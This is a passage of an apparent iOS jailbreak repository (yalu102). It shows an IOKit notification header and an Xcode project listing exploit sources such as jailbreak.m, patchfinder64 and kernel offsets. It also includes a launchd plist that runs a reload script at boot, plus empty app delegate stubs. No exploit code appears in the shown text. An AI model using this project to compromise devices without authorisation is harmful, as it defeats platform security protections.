    kIOKitNoticationTypeMask = 0x00000FFF,
    kIOKitNoticationTypeSizeAdjShift = 30,
    kIOKitNoticationMsgSizeMask = 3,
};

enum {
    kOSNotificationMessageID = 53,
    kOSAsyncCompleteMessageID = 57,
    kMaxAsyncArgs = 16
};

/*
 * Slot indexes into an async reference array. Slot 0 is reserved
 * (kIOAsyncReservedCount evaluates to 1), and the three callout layouts all
 * start at slot 1: async and matching use slots 1 and 2 (count 3), interest
 * uses slots 1 to 3 (count 4).
 */
enum {
    kIOAsyncReservedIndex = 0,
    kIOAsyncReservedCount,

    kIOAsyncCalloutFuncIndex = kIOAsyncReservedCount,
    kIOAsyncCalloutRefconIndex,
    kIOAsyncCalloutCount,

    kIOMatchingCalloutFuncIndex = kIOAsyncReservedCount,
    kIOMatchingCalloutRefconIndex,
    kIOMatchingCalloutCount,

    kIOInterestCalloutFuncIndex = kIOAsyncReservedCount,
    kIOInterestCalloutRefconIndex,
    kIOInterestCalloutServiceIndex,
    kIOInterestCalloutCount
};



// --------------
/* 64-bit reference layout: 8 slots of io_user_reference_t, with the byte size computed from sizeof. */
enum {
    kOSAsyncRef64Count = 8,
    kOSAsyncRef64Size = kOSAsyncRef64Count * ((int) sizeof(io_user_reference_t))
};
typedef io_user_reference_t OSAsyncReference64[kOSAsyncRef64Count];

/*
 * Header followed by a variable-length payload. `content` is a flexible
 * array member (written as a zero-length array for compilers older than
 * C99), so sizeof(struct OSNotificationHeader64) does not include the
 * payload.
 * `size` is documented as the content size and arrives inside the message.
 * Code that parses one of these should check `size` against the number of
 * bytes actually received before reading `content`.
 */
struct OSNotificationHeader64 {
    mach_msg_size_t size; /* content size */
    natural_t type;
    OSAsyncReference64 reference;

#if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L)
    unsigned char content[];
#else
    unsigned char content[0];
#endif
};

/* 4-byte packing applies to the struct that follows. */
#pragma pack(4)
struct IOServiceInterestContent64 {
natural_t messageType; 109 | io_user_reference_t messageArgument[1]; 110 | }; 111 | #pragma pack() 112 | // -------------- 113 | 114 | #if !KERNEL_USER32 115 | 116 | enum { 117 | kOSAsyncRefCount = 8, 118 | kOSAsyncRefSize = 32 119 | }; 120 | typedef natural_t OSAsyncReference[kOSAsyncRefCount]; 121 | 122 | struct OSNotificationHeader { 123 | mach_msg_size_t size; /* content size */ 124 | natural_t type; 125 | OSAsyncReference reference; 126 | 127 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 128 | unsigned char content[]; 129 | #else 130 | unsigned char content[0]; 131 | #endif 132 | }; 133 | 134 | #pragma pack(4) 135 | struct IOServiceInterestContent { 136 | natural_t messageType; 137 | void * messageArgument[1]; 138 | }; 139 | #pragma pack() 140 | 141 | #endif /* KERNEL_USER32 */ 142 | 143 | struct IOAsyncCompletionContent { 144 | IOReturn result; 145 | #if defined(__STDC_VERSION__) && (__STDC_VERSION__ >= 199901L) 146 | void * args[] __attribute__ ((packed)); 147 | #else 148 | void * args[0] __attribute__ ((packed)); 149 | #endif 150 | }; 151 | 152 | #ifndef __cplusplus 153 | typedef struct OSNotificationHeader OSNotificationHeader; 154 | typedef struct IOServiceInterestContent IOServiceInterestContent; 155 | typedef struct IOAsyncCompletionContent IOAsyncCompletionContent; 156 | #endif 157 | 158 | #ifdef __cplusplus 159 | } 160 | #endif 161 | 162 | #endif /* __OS_OSMESSAGENOTIFICATION_H */ 163 | 164 | -------------------------------------------------------------------------------- /SourceCode/yalu102.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 46; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */; }; 11 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BA61E398E33009CA025 /* 0.reload.plist */; }; 12 | EA1A3BAD1E399006009CA025 /* reload in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BAC1E399006009CA025 /* reload */; }; 13 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */; }; 14 | EA9900E81E1E9F060056FEBD /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900E71E1E9F060056FEBD /* main.m */; }; 15 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900EA1E1E9F060056FEBD /* AppDelegate.m */; }; 16 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9900ED1E1E9F060056FEBD /* ViewController.m */; }; 17 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900EF1E1E9F060056FEBD /* Main.storyboard */; }; 18 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */; }; 19 | EA9901041E219C210056FEBD /* offsets.c in Sources */ = {isa = PBXBuildFile; fileRef = EA9901021E219C210056FEBD /* offsets.c */; }; 20 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901051E219FF10056FEBD /* bootstrap.tar */; }; 21 | EA99010A1E21A04C0056FEBD /* tar in Resources */ = {isa = PBXBuildFile; fileRef = EA9901091E21A04C0056FEBD /* tar */; }; 22 | EA99010C1E21A0520056FEBD /* launchctl in Resources */ = {isa = PBXBuildFile; fileRef = EA99010B1E21A0520056FEBD /* launchctl */; }; 23 | 
EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = EA99010D1E21A1560056FEBD /* jailbreak.m */; }; 24 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901131E21A1B00056FEBD /* iokitmig64.o */; }; 25 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */ = {isa = PBXBuildFile; fileRef = EA9901161E21A1D90056FEBD /* devicesupport.m */; }; 26 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = EA9901181E21A2180056FEBD /* IOKit.tbd */; }; 27 | /* End PBXBuildFile section */ 28 | 29 | /* Begin PBXFileReference section */ 30 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; 31 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; 32 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; 33 | EA1A3BAC1E399006009CA025 /* reload */ = {isa = PBXFileReference; lastKnownFileType = text.script.sh; path = reload; sourceTree = ""; }; 34 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 35 | EA9900E31E1E9F060056FEBD /* yalu102.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = yalu102.app; sourceTree = BUILT_PRODUCTS_DIR; }; 36 | EA9900E71E1E9F060056FEBD /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; 37 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = ""; }; 38 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */ = 
{isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = ""; }; 39 | EA9900EC1E1E9F060056FEBD /* ViewController.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ViewController.h; sourceTree = ""; }; 40 | EA9900ED1E1E9F060056FEBD /* ViewController.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = ViewController.m; sourceTree = ""; }; 41 | EA9900F01E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = ""; }; 42 | EA9900F51E1E9F060056FEBD /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = ""; }; 43 | EA9900F71E1E9F060056FEBD /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = ""; }; 44 | EA9901021E219C210056FEBD /* offsets.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = offsets.c; sourceTree = ""; }; 45 | EA9901031E219C210056FEBD /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = ""; }; 46 | EA9901051E219FF10056FEBD /* bootstrap.tar */ = {isa = PBXFileReference; lastKnownFileType = archive.tar; path = bootstrap.tar; sourceTree = ""; }; 47 | EA9901091E21A04C0056FEBD /* tar */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = tar; sourceTree = ""; }; 48 | EA99010B1E21A0520056FEBD /* launchctl */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.executable"; path = launchctl; sourceTree = ""; }; 49 | EA99010D1E21A1560056FEBD /* jailbreak.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = jailbreak.m; sourceTree = ""; }; 50 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */ = {isa = PBXFileReference; fileEncoding = 4; 
lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; 51 | EA9901131E21A1B00056FEBD /* iokitmig64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = iokitmig64.o; sourceTree = ""; }; 52 | EA9901151E21A1D90056FEBD /* devicesupport.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = devicesupport.h; sourceTree = ""; }; 53 | EA9901161E21A1D90056FEBD /* devicesupport.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = devicesupport.m; sourceTree = ""; }; 54 | EA9901181E21A2180056FEBD /* IOKit.tbd */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = "sourcecode.text-based-dylib-definition"; path = IOKit.tbd; sourceTree = ""; }; 55 | /* End PBXFileReference section */ 56 | 57 | /* Begin PBXFrameworksBuildPhase section */ 58 | EA9900E01E1E9F060056FEBD /* Frameworks */ = { 59 | isa = PBXFrameworksBuildPhase; 60 | buildActionMask = 2147483647; 61 | files = ( 62 | EA9901141E21A1B00056FEBD /* iokitmig64.o in Frameworks */, 63 | EA1A3B9D1E391C4F009CA025 /* patchfinder64.o in Frameworks */, 64 | EA9901191E21A2180056FEBD /* IOKit.tbd in Frameworks */, 65 | ); 66 | runOnlyForDeploymentPostprocessing = 0; 67 | }; 68 | /* End PBXFrameworksBuildPhase section */ 69 | 70 | /* Begin PBXGroup section */ 71 | EA9900DA1E1E9F060056FEBD = { 72 | isa = PBXGroup; 73 | children = ( 74 | EA9900E51E1E9F060056FEBD /* yalu102 */, 75 | EA9900E41E1E9F060056FEBD /* Products */, 76 | ); 77 | sourceTree = ""; 78 | }; 79 | EA9900E41E1E9F060056FEBD /* Products */ = { 80 | isa = PBXGroup; 81 | children = ( 82 | EA9900E31E1E9F060056FEBD /* yalu102.app */, 83 | ); 84 | name = Products; 85 | sourceTree = ""; 86 | }; 87 | EA9900E51E1E9F060056FEBD /* yalu102 */ = { 88 | isa = PBXGroup; 89 | children = ( 90 | EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, 91 | EA9901021E219C210056FEBD /* offsets.c */, 92 | EA9901031E219C210056FEBD /* offsets.h */, 93 | 
EA99010D1E21A1560056FEBD /* jailbreak.m */, 94 | EA9900E91E1E9F060056FEBD /* AppDelegate.h */, 95 | EA1A3BA61E398E33009CA025 /* 0.reload.plist */, 96 | EA1A3BAC1E399006009CA025 /* reload */, 97 | EA9900EA1E1E9F060056FEBD /* AppDelegate.m */, 98 | EA9900EC1E1E9F060056FEBD /* ViewController.h */, 99 | EA9900ED1E1E9F060056FEBD /* ViewController.m */, 100 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */, 101 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */, 102 | EA9900F71E1E9F060056FEBD /* Info.plist */, 103 | EA9901051E219FF10056FEBD /* bootstrap.tar */, 104 | EA9901091E21A04C0056FEBD /* tar */, 105 | EA99010B1E21A0520056FEBD /* launchctl */, 106 | EA9901131E21A1B00056FEBD /* iokitmig64.o */, 107 | EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, 108 | EA99010F1E21A1A00056FEBD /* pte_stuff.h */, 109 | EA1A3BC41E39D1FF009CA025 /* Assets.xcassets */, 110 | EA9901181E21A2180056FEBD /* IOKit.tbd */, 111 | EA9901151E21A1D90056FEBD /* devicesupport.h */, 112 | EA9901161E21A1D90056FEBD /* devicesupport.m */, 113 | EA9900E61E1E9F060056FEBD /* Supporting Files */, 114 | ); 115 | path = yalu102; 116 | sourceTree = ""; 117 | }; 118 | EA9900E61E1E9F060056FEBD /* Supporting Files */ = { 119 | isa = PBXGroup; 120 | children = ( 121 | EA9900E71E1E9F060056FEBD /* main.m */, 122 | ); 123 | name = "Supporting Files"; 124 | sourceTree = ""; 125 | }; 126 | /* End PBXGroup section */ 127 | 128 | /* Begin PBXNativeTarget section */ 129 | EA9900E21E1E9F060056FEBD /* yalu102 */ = { 130 | isa = PBXNativeTarget; 131 | buildConfigurationList = EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */; 132 | buildPhases = ( 133 | EA9900DF1E1E9F060056FEBD /* Sources */, 134 | EA9900E01E1E9F060056FEBD /* Frameworks */, 135 | EA9900E11E1E9F060056FEBD /* Resources */, 136 | ); 137 | buildRules = ( 138 | ); 139 | dependencies = ( 140 | ); 141 | name = yalu102; 142 | productName = yalu102; 143 | productReference = EA9900E31E1E9F060056FEBD /* yalu102.app */; 144 | 
productType = "com.apple.product-type.application"; 145 | }; 146 | /* End PBXNativeTarget section */ 147 | 148 | /* Begin PBXProject section */ 149 | EA9900DB1E1E9F060056FEBD /* Project object */ = { 150 | isa = PBXProject; 151 | attributes = { 152 | LastUpgradeCheck = 0820; 153 | ORGANIZATIONNAME = kimjongcracks; 154 | TargetAttributes = { 155 | EA9900E21E1E9F060056FEBD = { 156 | CreatedOnToolsVersion = 8.2.1; 157 | DevelopmentTeam = 6SF652BXT8; 158 | ProvisioningStyle = Automatic; 159 | }; 160 | }; 161 | }; 162 | buildConfigurationList = EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */; 163 | compatibilityVersion = "Xcode 3.2"; 164 | developmentRegion = English; 165 | hasScannedForEncodings = 0; 166 | knownRegions = ( 167 | en, 168 | Base, 169 | ); 170 | mainGroup = EA9900DA1E1E9F060056FEBD; 171 | productRefGroup = EA9900E41E1E9F060056FEBD /* Products */; 172 | projectDirPath = ""; 173 | projectRoot = ""; 174 | targets = ( 175 | EA9900E21E1E9F060056FEBD /* yalu102 */, 176 | ); 177 | }; 178 | /* End PBXProject section */ 179 | 180 | /* Begin PBXResourcesBuildPhase section */ 181 | EA9900E11E1E9F060056FEBD /* Resources */ = { 182 | isa = PBXResourcesBuildPhase; 183 | buildActionMask = 2147483647; 184 | files = ( 185 | EA99010A1E21A04C0056FEBD /* tar in Resources */, 186 | EA99010C1E21A0520056FEBD /* launchctl in Resources */, 187 | EA9901061E219FF10056FEBD /* bootstrap.tar in Resources */, 188 | EA1A3BA81E398E33009CA025 /* 0.reload.plist in Resources */, 189 | EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, 190 | EA1A3BAD1E399006009CA025 /* reload in Resources */, 191 | EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, 192 | EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, 193 | ); 194 | runOnlyForDeploymentPostprocessing = 0; 195 | }; 196 | /* End PBXResourcesBuildPhase section */ 197 | 198 | /* Begin PBXSourcesBuildPhase section */ 199 | EA9900DF1E1E9F060056FEBD /* Sources */ = { 200 | 
isa = PBXSourcesBuildPhase; 201 | buildActionMask = 2147483647; 202 | files = ( 203 | EA9901041E219C210056FEBD /* offsets.c in Sources */, 204 | EA9901171E21A1D90056FEBD /* devicesupport.m in Sources */, 205 | EA9900EE1E1E9F060056FEBD /* ViewController.m in Sources */, 206 | EA9900EB1E1E9F060056FEBD /* AppDelegate.m in Sources */, 207 | EA99010E1E21A1560056FEBD /* jailbreak.m in Sources */, 208 | EA9900E81E1E9F060056FEBD /* main.m in Sources */, 209 | ); 210 | runOnlyForDeploymentPostprocessing = 0; 211 | }; 212 | /* End PBXSourcesBuildPhase section */ 213 | 214 | /* Begin PBXVariantGroup section */ 215 | EA9900EF1E1E9F060056FEBD /* Main.storyboard */ = { 216 | isa = PBXVariantGroup; 217 | children = ( 218 | EA9900F01E1E9F060056FEBD /* Base */, 219 | ); 220 | name = Main.storyboard; 221 | sourceTree = ""; 222 | }; 223 | EA9900F41E1E9F060056FEBD /* LaunchScreen.storyboard */ = { 224 | isa = PBXVariantGroup; 225 | children = ( 226 | EA9900F51E1E9F060056FEBD /* Base */, 227 | ); 228 | name = LaunchScreen.storyboard; 229 | sourceTree = ""; 230 | }; 231 | /* End PBXVariantGroup section */ 232 | 233 | /* Begin XCBuildConfiguration section */ 234 | EA9900F81E1E9F060056FEBD /* Debug */ = { 235 | isa = XCBuildConfiguration; 236 | buildSettings = { 237 | ALWAYS_SEARCH_USER_PATHS = NO; 238 | ARCHS = armv7; 239 | CLANG_ANALYZER_NONNULL = YES; 240 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 241 | CLANG_CXX_LIBRARY = "libc++"; 242 | CLANG_ENABLE_MODULES = YES; 243 | CLANG_ENABLE_OBJC_ARC = YES; 244 | CLANG_WARN_BOOL_CONVERSION = YES; 245 | CLANG_WARN_CONSTANT_CONVERSION = YES; 246 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 247 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 248 | CLANG_WARN_EMPTY_BODY = YES; 249 | CLANG_WARN_ENUM_CONVERSION = YES; 250 | CLANG_WARN_INFINITE_RECURSION = YES; 251 | CLANG_WARN_INT_CONVERSION = YES; 252 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 253 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 254 | CLANG_WARN_UNREACHABLE_CODE = YES; 255 | 
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 256 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 257 | COPY_PHASE_STRIP = NO; 258 | DEBUG_INFORMATION_FORMAT = dwarf; 259 | ENABLE_BITCODE = NO; 260 | ENABLE_STRICT_OBJC_MSGSEND = YES; 261 | ENABLE_TESTABILITY = YES; 262 | GCC_C_LANGUAGE_STANDARD = gnu99; 263 | GCC_DYNAMIC_NO_PIC = NO; 264 | GCC_NO_COMMON_BLOCKS = YES; 265 | GCC_OPTIMIZATION_LEVEL = 0; 266 | GCC_PREPROCESSOR_DEFINITIONS = ( 267 | "DEBUG=1", 268 | "$(inherited)", 269 | ); 270 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 271 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 272 | GCC_WARN_UNDECLARED_SELECTOR = YES; 273 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 274 | GCC_WARN_UNUSED_FUNCTION = YES; 275 | GCC_WARN_UNUSED_VARIABLE = YES; 276 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 277 | LD_NO_PIE = YES; 278 | MTL_ENABLE_DEBUG_INFO = YES; 279 | ONLY_ACTIVE_ARCH = YES; 280 | SDKROOT = iphoneos; 281 | TARGETED_DEVICE_FAMILY = "1,2"; 282 | }; 283 | name = Debug; 284 | }; 285 | EA9900F91E1E9F060056FEBD /* Release */ = { 286 | isa = XCBuildConfiguration; 287 | buildSettings = { 288 | ALWAYS_SEARCH_USER_PATHS = NO; 289 | ARCHS = armv7; 290 | CLANG_ANALYZER_NONNULL = YES; 291 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++0x"; 292 | CLANG_CXX_LIBRARY = "libc++"; 293 | CLANG_ENABLE_MODULES = YES; 294 | CLANG_ENABLE_OBJC_ARC = YES; 295 | CLANG_WARN_BOOL_CONVERSION = YES; 296 | CLANG_WARN_CONSTANT_CONVERSION = YES; 297 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 298 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 299 | CLANG_WARN_EMPTY_BODY = YES; 300 | CLANG_WARN_ENUM_CONVERSION = YES; 301 | CLANG_WARN_INFINITE_RECURSION = YES; 302 | CLANG_WARN_INT_CONVERSION = YES; 303 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 304 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 305 | CLANG_WARN_UNREACHABLE_CODE = YES; 306 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 307 | "CODE_SIGN_IDENTITY[sdk=iphoneos*]" = "iPhone Developer"; 308 | COPY_PHASE_STRIP = NO; 309 | DEBUG_INFORMATION_FORMAT = 
"dwarf-with-dsym"; 310 | ENABLE_BITCODE = NO; 311 | ENABLE_NS_ASSERTIONS = NO; 312 | ENABLE_STRICT_OBJC_MSGSEND = YES; 313 | GCC_C_LANGUAGE_STANDARD = gnu99; 314 | GCC_NO_COMMON_BLOCKS = YES; 315 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 316 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 317 | GCC_WARN_UNDECLARED_SELECTOR = YES; 318 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 319 | GCC_WARN_UNUSED_FUNCTION = YES; 320 | GCC_WARN_UNUSED_VARIABLE = YES; 321 | IPHONEOS_DEPLOYMENT_TARGET = 10.0; 322 | LD_NO_PIE = YES; 323 | MTL_ENABLE_DEBUG_INFO = NO; 324 | SDKROOT = iphoneos; 325 | TARGETED_DEVICE_FAMILY = "1,2"; 326 | VALIDATE_PRODUCT = YES; 327 | }; 328 | name = Release; 329 | }; 330 | EA9900FB1E1E9F060056FEBD /* Debug */ = { 331 | isa = XCBuildConfiguration; 332 | buildSettings = { 333 | ARCHS = armv7; 334 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 335 | CLANG_ENABLE_OBJC_ARC = NO; 336 | DEVELOPMENT_TEAM = 6SF652BXT8; 337 | INFOPLIST_FILE = yalu102/Info.plist; 338 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 339 | LIBRARY_SEARCH_PATHS = ( 340 | "$(inherited)", 341 | "$(PROJECT_DIR)/yalu102", 342 | ); 343 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 344 | PRODUCT_NAME = "$(TARGET_NAME)"; 345 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 346 | VALID_ARCHS = armv7; 347 | }; 348 | name = Debug; 349 | }; 350 | EA9900FC1E1E9F060056FEBD /* Release */ = { 351 | isa = XCBuildConfiguration; 352 | buildSettings = { 353 | ARCHS = armv7; 354 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 355 | CLANG_ENABLE_OBJC_ARC = NO; 356 | DEVELOPMENT_TEAM = 6SF652BXT8; 357 | INFOPLIST_FILE = yalu102/Info.plist; 358 | LD_RUNPATH_SEARCH_PATHS = "$(inherited) @executable_path/Frameworks"; 359 | LIBRARY_SEARCH_PATHS = ( 360 | "$(inherited)", 361 | "$(PROJECT_DIR)/yalu102", 362 | ); 363 | PRODUCT_BUNDLE_IDENTIFIER = kim.cracksby.yalu102; 364 | PRODUCT_NAME = "$(TARGET_NAME)"; 365 | USER_HEADER_SEARCH_PATHS = "$(PROJECT_DIR)/Headers"; 366 | 
VALID_ARCHS = armv7; 367 | }; 368 | name = Release; 369 | }; 370 | /* End XCBuildConfiguration section */ 371 | 372 | /* Begin XCConfigurationList section */ 373 | EA9900DE1E1E9F060056FEBD /* Build configuration list for PBXProject "yalu102" */ = { 374 | isa = XCConfigurationList; 375 | buildConfigurations = ( 376 | EA9900F81E1E9F060056FEBD /* Debug */, 377 | EA9900F91E1E9F060056FEBD /* Release */, 378 | ); 379 | defaultConfigurationIsVisible = 0; 380 | defaultConfigurationName = Release; 381 | }; 382 | EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */ = { 383 | isa = XCConfigurationList; 384 | buildConfigurations = ( 385 | EA9900FB1E1E9F060056FEBD /* Debug */, 386 | EA9900FC1E1E9F060056FEBD /* Release */, 387 | ); 388 | defaultConfigurationIsVisible = 0; 389 | defaultConfigurationName = Release; 390 | }; 391 | /* End XCConfigurationList section */ 392 | }; 393 | rootObject = EA9900DB1E1E9F060056FEBD /* Project object */; 394 | } 395 | -------------------------------------------------------------------------------- /SourceCode/yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /SourceCode/yalu102/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /SourceCode/yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 
7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /SourceCode/yalu102/AppDelegate.m: --------------------------------------------------------------------------------
//
//  AppDelegate.m
//  yalu102
//
//  Created by qwertyoruiop on 05/01/2017.
//  Copyright © 2017 kimjongcracks. All rights reserved.
//
//  Application delegate. Every lifecycle hook in this file is an empty stub
//  (the launch hook only returns YES); no application logic is implemented
//  in this file.
//

#import "AppDelegate.h"

// Empty class extension: no private properties or methods are declared.
@interface AppDelegate ()

@end

@implementation AppDelegate


// Launch hook. Performs no setup and always returns YES; launchOptions is
// not inspected.
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
    // Override point for customization after application launch.
    return YES;
}


// Empty stub: nothing is paused or saved when the app becomes inactive.
- (void)applicationWillResignActive:(UIApplication *)application {
    // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
    // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
}


// Empty stub: no state is stored or released on entering the background.
- (void)applicationDidEnterBackground:(UIApplication *)application {
    // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
    // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
}


// Empty stub: nothing is restored when returning to the foreground.
- (void)applicationWillEnterForeground:(UIApplication *)application {
    // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
}


// Empty stub: no tasks are restarted and the UI is not refreshed here.
- (void)applicationDidBecomeActive:(UIApplication *)application {
    // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
}


// Empty stub: nothing is saved on termination.
- (void)applicationWillTerminate:(UIApplication *)application {
    // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
}


@end

-------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /SourceCode/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: --------------------------------------------------------------------------------
